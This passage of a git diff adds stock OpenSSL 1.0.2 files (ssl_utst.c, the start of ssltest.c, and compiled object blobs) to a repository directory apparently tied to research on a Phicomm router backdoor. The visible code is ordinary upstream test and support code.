+                   X509_verify_cert_error_string(x->verify_result)) <= 0)
+        goto err;
+
+    return (1);
+ err:
+    return (0);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_txt.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_txt.o
new file mode 100644
index 0000000000000000000000000000000000000000..b70d76a665eae6c33931f07302d8f930bd26fa53
GIT binary patch
literal 5648
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

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_utst.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_utst.c
new file mode 100644
index 0000000..53bdde3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_utst.c
@@ -0,0 +1,72 @@
+/* ssl_utst.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2014 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include "ssl_locl.h"
+
+#ifndef OPENSSL_NO_UNIT_TEST
+
+static const struct openssl_ssl_test_functions ssl_test_functions = {
+    ssl_init_wbio_buffer,
+    ssl3_setup_buffers,
+    tls1_process_heartbeat,
+    dtls1_process_heartbeat
+};
+
+const struct openssl_ssl_test_functions *SSL_test_functions(void)
+{
+    return &ssl_test_functions;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_utst.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssl_utst.o
new file mode 100644
index 0000000000000000000000000000000000000000..64e29ecbb7e7cddb9c699d853f6eabdc5ffcf2c6
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`ECm!@Bc!?(!?UMR|=s^Od_9Eh?;6aci28EgrvKz1${R{pakNr#j
z0-Z^AaoMCEIxu-VZ{M4pY}$|E&2`6dK!*cY@K<RT;L9NWiuPe0)&NF>!KJ%D4$D-Q
z?gc;LUax;%R%QSF*yG;mK~2}ax(J(?OPHhEF?0ZC#4*hOf{yRP_fMOKwN6Yuv3pCf
zIj6B|s-}U#a+5@c;Y5uP;`OnVLh=ZJi)kW*5K$I2zUY;V-z4y-KnB1=A%I6&lEf);
zX(nTiSJM+Rh$gCjPD`E_SsoX1+Bk9%Vh2rhr}mrqbD9~Szf$btlQ{dk`PFXoVf*(`
zvWmH={|LR*)5A2wSH+=8;#!}t@yy^%>BKCIwf1Rhh>I0W`xllgfvZphy{j42&-T*(
rrxMK+l20d5+lt43UgPd)>rM^2p>!JT`L}SxzI)O>DB-;}DzyE-<5W4}

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssltest.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssltest.c
new file mode 100644
index 0000000..0113b65
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/ssltest.c
@@ -0,0 +1,3017 @@
+/* ssl/ssltest.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECC cipher suite support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+/* Or gethostname won't be declared properly on Linux and GNU platforms. */
+#define _BSD_SOURCE 1
+
+#include <assert.h>
+#include <errno.h>
+#include <limits.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+
+#define USE_SOCKETS
+#include "e_os.h"
+
+#ifdef OPENSSL_SYS_VMS
+/*
+ * Or isascii won't be declared properly on VMS (at least with DECompHP C).
+ */
+# define _XOPEN_SOURCE 500
+#endif
+
+#include <ctype.h>
+
+#include <openssl/bio.h>
+#include <openssl/crypto.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/x509v3.h>
+#include <openssl/ssl.h>
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+#include <openssl/err.h>
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#ifndef OPENSSL_NO_SRP
+# include <openssl/srp.h>
+#endif
+#include <openssl/bn.h>
+
+/*
+ * Or gethostname won't be declared properly
+ * on Compaq platforms (at least with DEC C).
+ * Do not try to put it earlier, or IPv6 includes
+ * get screwed...
+ */
+#define _XOPEN_SOURCE_EXTENDED  1
+
+#ifdef OPENSSL_SYS_WINDOWS
+# include <winsock.h>
+#else
+# include OPENSSL_UNISTD
+#endif
+
+#ifdef OPENSSL_SYS_VMS
+# define TEST_SERVER_CERT "SYS$DISK:[-.APPS]SERVER.PEM"
+# define TEST_CLIENT_CERT "SYS$DISK:[-.APPS]CLIENT.PEM"
+#elif defined(OPENSSL_SYS_WINCE)
+# define TEST_SERVER_CERT "\\OpenSSL\\server.pem"
+# define TEST_CLIENT_CERT "\\OpenSSL\\client.pem"
+#elif defined(OPENSSL_SYS_NETWARE)
+# define TEST_SERVER_CERT "\\openssl\\apps\\server.pem"
+# define TEST_CLIENT_CERT "\\openssl\\apps\\client.pem"
+#else
+# define TEST_SERVER_CERT "../apps/server.pem"
+# define TEST_CLIENT_CERT "../apps/client.pem"
+#endif
+
+/*
+ * There is really no standard for this, so let's assign some tentative
+ * numbers.  In any case, these numbers are only for this test
+ */
+#define COMP_RLE        255
+#define COMP_ZLIB       1
+
+static int MS_CALLBACK verify_callback(int ok, X509_STORE_CTX *ctx);
+#ifndef OPENSSL_NO_RSA
+static RSA MS_CALLBACK *tmp_rsa_cb(SSL *s, int is_export, int keylength);
+static void free_tmp_rsa(void);
+#endif
+static int MS_CALLBACK app_verify_callback(X509_STORE_CTX *ctx, void *arg);
+#define APP_CALLBACK_STRING "Test Callback Argument"
+struct app_verify_arg {
+    char *string;
+    int app_verify;
+    int allow_proxy_certs;
+    char *proxy_auth;
+    char *proxy_cond;
+};
+
+#ifndef OPENSSL_NO_DH
+static DH *get_dh512(void);
+static DH *get_dh1024(void);
+static DH *get_dh1024dsa(void);
+#endif
+
+static char *psk_key = NULL;    /* by default PSK is not used */
+#ifndef OPENSSL_NO_PSK
+static unsigned int psk_client_callback(SSL *ssl, const char *hint,
+                                        char *identity,
+                                        unsigned int max_identity_len,
+                                        unsigned char *psk,
+                                        unsigned int max_psk_len);
+static unsigned int psk_server_callback(SSL *ssl, const char *identity,
+                                        unsigned char *psk,
+                                        unsigned int max_psk_len);
+#endif
+
+#ifndef OPENSSL_NO_SRP
+/* SRP client */
+/* This is a context that we pass to all callbacks */
+typedef struct srp_client_arg_st {
+    char *srppassin;
+    char *srplogin;
+} SRP_CLIENT_ARG;
+
+# define PWD_STRLEN 1024
+
+static char *MS_CALLBACK ssl_give_srp_client_pwd_cb(SSL *s, void *arg)
+{
+    SRP_CLIENT_ARG *srp_client_arg = (SRP_CLIENT_ARG *)arg;
+    return BUF_strdup((char *)srp_client_arg->srppassin);
+}
+
+/* SRP server */
+/* This is a context that we pass to SRP server callbacks */
+typedef struct srp_server_arg_st {
+    char *expected_user;
+    char *pass;
+} SRP_SERVER_ARG;
+
+static int MS_CALLBACK ssl_srp_server_param_cb(SSL *s, int *ad, void *arg)
+{
+    SRP_SERVER_ARG *p = (SRP_SERVER_ARG *)arg;
+
+    if (strcmp(p->expected_user, SSL_get_srp_username(s)) != 0) {
+        fprintf(stderr, "User %s doesn't exist\n", SSL_get_srp_username(s));
+        return SSL3_AL_FATAL;
+    }
+    if (SSL_set_srp_server_param_pw(s, p->expected_user, p->pass, "1024") < 0) {
+        *ad = SSL_AD_INTERNAL_ERROR;
+        return SSL3_AL_FATAL;
+    }
+    return SSL_ERROR_NONE;
+}
+#endif
+
+static BIO *bio_err = NULL;
+static BIO *bio_stdout = NULL;
+
+static const char *alpn_client;
+static const char *alpn_server;
+static const char *alpn_expected;
+static unsigned char *alpn_selected;
+
+/*-
+ * next_protos_parse parses a comma separated list of strings into a string
+ * in a format suitable for passing to SSL_CTX_set_next_protos_advertised.
+ *   outlen: (output) set to the length of the resulting buffer on success.
+ *   err: (maybe NULL) on failure, an error message line is written to this BIO.
+ *   in: a NUL terminated string like "abc,def,ghi"
+ *
+ *   returns: a malloced buffer or NULL on failure.
+ */
+static unsigned char *next_protos_parse(unsigned short *outlen,
+                                        const char *in)
+{
+    size_t len;
+    unsigned char *out;
+    size_t i, start = 0;
+
+    len = strlen(in);
+    if (len >= 65535)
+        return NULL;
+
+    out = OPENSSL_malloc(strlen(in) + 1);
+    if (!out)
+        return NULL;
+
+    for (i = 0; i <= len; ++i) {
+        if (i == len || in[i] == ',') {
+            if (i - start > 255) {
+                OPENSSL_free(out);
+                return NULL;
+            }
+            out[start] = i - start;
+            start = i + 1;
+        } else
+            out[i + 1] = in[i];
+    }
+
+    *outlen = len + 1;
+    return out;
+}
+
+static int cb_server_alpn(SSL *s, const unsigned char **out,
+                          unsigned char *outlen, const unsigned char *in,
+                          unsigned int inlen, void *arg)
+{
+    unsigned char *protos;
+    unsigned short protos_len;
+
+    protos = next_protos_parse(&protos_len, alpn_server);
+    if (protos == NULL) {
+        fprintf(stderr, "failed to parser ALPN server protocol string: %s\n",
+                alpn_server);
+        abort();
+    }
+
+    if (SSL_select_next_proto
+        ((unsigned char **)out, outlen, protos, protos_len, in,
+         inlen) != OPENSSL_NPN_NEGOTIATED) {
+        OPENSSL_free(protos);
+        return SSL_TLSEXT_ERR_NOACK;
+    }
+
+    /*
+     * Make a copy of the selected protocol which will be freed in
+     * verify_alpn.
+     */
+    alpn_selected = OPENSSL_malloc(*outlen);
+    memcpy(alpn_selected, *out, *outlen);
+    *out = alpn_selected;
+
+    OPENSSL_free(protos);
+    return SSL_TLSEXT_ERR_OK;
+}
+
+static int verify_alpn(SSL *client, SSL *server)
+{
+    const unsigned char *client_proto, *server_proto;
+    unsigned int client_proto_len = 0, server_proto_len = 0;
+    SSL_get0_alpn_selected(client, &client_proto, &client_proto_len);
+    SSL_get0_alpn_selected(server, &server_proto, &server_proto_len);
+
+    if (alpn_selected != NULL) {
+        OPENSSL_free(alpn_selected);
+        alpn_selected = NULL;
+    }
+
+    if (client_proto_len != server_proto_len ||
+        memcmp(client_proto, server_proto, client_proto_len) != 0) {
+        BIO_printf(bio_stdout, "ALPN selected protocols differ!\n");
+        goto err;
+    }
+
+    if (client_proto_len > 0 && alpn_expected == NULL) {
+        BIO_printf(bio_stdout, "ALPN unexpectedly negotiated\n");
+        goto err;
+    }
+
+    if (alpn_expected != NULL &&
+        (client_proto_len != strlen(alpn_expected) ||
+         memcmp(client_proto, alpn_expected, client_proto_len) != 0)) {
+        BIO_printf(bio_stdout,
+                   "ALPN selected protocols not equal to expected protocol: %s\n",
+                   alpn_expected);
+        goto err;
+    }
+
+    return 0;
+
+ err:
+    BIO_printf(bio_stdout, "ALPN results: client: '");
+    BIO_write(bio_stdout, client_proto, client_proto_len);
+    BIO_printf(bio_stdout, "', server: '");
+    BIO_write(bio_stdout, server_proto, server_proto_len);
+    BIO_printf(bio_stdout, "'\n");
+    BIO_printf(bio_stdout, "ALPN configured: client: '%s', server: '%s'\n",
+               alpn_client, alpn_server);
+    return -1;
+}
+
+#define SCT_EXT_TYPE 18
+
+/*
+ * WARNING : below extension types are *NOT* IETF assigned, and could
+ * conflict if these types are reassigned and handled specially by OpenSSL
+ * in the future
+ */
+#define TACK_EXT_TYPE 62208
+#define CUSTOM_EXT_TYPE_0 1000
+#define CUSTOM_EXT_TYPE_1 1001
+#define CUSTOM_EXT_TYPE_2 1002
+#define CUSTOM_EXT_TYPE_3 1003
+
+const char custom_ext_cli_string[] = "abc";
+const char custom_ext_srv_string[] = "defg";
+
+/* These set from cmdline */
+char *serverinfo_file = NULL;
+int serverinfo_sct = 0;
+int serverinfo_tack = 0;
+
+/* These set based on extension callbacks */
+int serverinfo_sct_seen = 0;
+int serverinfo_tack_seen = 0;
+int serverinfo_other_seen = 0;
+
+/* This set from cmdline */
+int custom_ext = 0;
+
+/* This set based on extension callbacks */
+int custom_ext_error = 0;
+
+static int serverinfo_cli_parse_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char *in, size_t inlen,
+                                   int *al, void *arg)
+{
+    if (ext_type == SCT_EXT_TYPE)
+        serverinfo_sct_seen++;
+    else if (ext_type == TACK_EXT_TYPE)
+        serverinfo_tack_seen++;
+    else
+        serverinfo_other_seen++;
+    return 1;
+}
+
+static int verify_serverinfo()
+{
+    if (serverinfo_sct != serverinfo_sct_seen)
+        return -1;
+    if (serverinfo_tack != serverinfo_tack_seen)
+        return -1;
+    if (serverinfo_other_seen)
+        return -1;
+    return 0;
+}
+
+/*-
+ * Four test cases for custom extensions:
+ * 0 - no ClientHello extension or ServerHello response
+ * 1 - ClientHello with "abc", no response
+ * 2 - ClientHello with "abc", empty response
+ * 3 - ClientHello with "abc", "defg" response
+ */
+
+static int custom_ext_0_cli_add_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char **out,
+                                   size_t *outlen, int *al, void *arg)
+{
+    if (ext_type != CUSTOM_EXT_TYPE_0)
+        custom_ext_error = 1;
+    return 0;                   /* Don't send an extension */
+}
+
+static int custom_ext_0_cli_parse_cb(SSL *s, unsigned int ext_type,
+                                     const unsigned char *in,
+                                     size_t inlen, int *al, void *arg)
+{
+    return 1;
+}
+
+static int custom_ext_1_cli_add_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char **out,
+                                   size_t *outlen, int *al, void *arg)
+{
+    if (ext_type != CUSTOM_EXT_TYPE_1)
+        custom_ext_error = 1;
+    *out = (const unsigned char *)custom_ext_cli_string;
+    *outlen = strlen(custom_ext_cli_string);
+    return 1;                   /* Send "abc" */
+}
+
+static int custom_ext_1_cli_parse_cb(SSL *s, unsigned int ext_type,
+                                     const unsigned char *in,
+                                     size_t inlen, int *al, void *arg)
+{
+    return 1;
+}
+
+static int custom_ext_2_cli_add_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char **out,
+                                   size_t *outlen, int *al, void *arg)
+{
+    if (ext_type != CUSTOM_EXT_TYPE_2)
+        custom_ext_error = 1;
+    *out = (const unsigned char *)custom_ext_cli_string;
+    *outlen = strlen(custom_ext_cli_string);
+    return 1;                   /* Send "abc" */
+}
+
+static int custom_ext_2_cli_parse_cb(SSL *s, unsigned int ext_type,
+                                     const unsigned char *in,
+                                     size_t inlen, int *al, void *arg)
+{
+    if (ext_type != CUSTOM_EXT_TYPE_2)
+        custom_ext_error = 1;
+    if (inlen != 0)
+        custom_ext_error = 1;   /* Should be empty response */
+    return 1;
+}
+
+static int custom_ext_3_cli_add_cb(SSL *s, unsigned int ext_type,
+                                   const unsigned char **out,
+                                   size_t *outlen, int *al, void *arg)
+{
+    if (ext_type != CUSTOM_EXT_TYPE_3)
+        custom_ext_error = 1;
+    *out = (const unsigned char *)custom_ext_cli_string;
+    *outlen = strlen(custom_ext_cli_string);
+    return 1;                   /* Send "abc" */
+}
+
+static int custom_ext_3_cli_parse_cb(SSL *s, unsigned int ext_type,
+                                     const unsigned char *in,
+                                     size_t inlen, int *al, void *arg)
+{
+    if (ext_type != CUSTOM_EXT_TYPE_3)
+        custom_ext_error = 1;
+    if (inlen != strlen(custom_ext_srv_string))
+        custom_ext_error = 1;
+    if (memcmp(custom_ext_srv_string, in, inlen) != 0)
+        custom_ext_error = 1;   /* Check for "defg" */
+    return 1;
+}
+
+/*
+ * custom_ext_0_cli_add_cb returns 0 - the server won't receive a callback
+ * for this extension
+ */
